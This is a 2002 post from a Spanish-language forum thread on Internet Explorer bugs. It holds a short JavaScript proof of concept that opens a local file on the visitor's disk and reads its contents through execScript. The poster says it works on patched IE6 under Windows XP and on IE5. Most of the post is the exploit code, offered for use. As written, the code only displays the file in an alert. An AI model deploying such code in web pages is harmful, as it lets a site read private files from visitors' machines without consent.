Tema: Bugs de IE
Ver Mensaje Individual
  #5 (permalink)  
Antiguo 15/01/2002, 06:02
Avatar de Alfon
Alfon
Colaborador
 
Fecha de Ingreso: octubre-2000
Mensajes: 1.976
Antigüedad: 24 años, 2 meses
Puntos: 14
Re: Bugs de IE

Mira esto xombra:

Si ya sabes que existe ne el disco remoto el fichero "fichero.txt" para abrirlo solo tendrás que usar este código:

<script language="javascript">

var extDoc

function doIt() {

// open an external window and store the reference to it in extDoc

extDoc = document.open('file:///C:/fichero.txt','fichero','height=200,width=400,statu s=no,toolbar=no,menubar=no,location=no');

cmd = 'extDoc.execScript("alert(document.body.inner Text)", "Jscript");';
setTimeout(cmd,2000);

}

</script>

Esto funcionará en IE6 winXP (aunque tenga todos los parches instalados) y en IE 5.0 winME.

Un saludo,

Alfon
[email protected]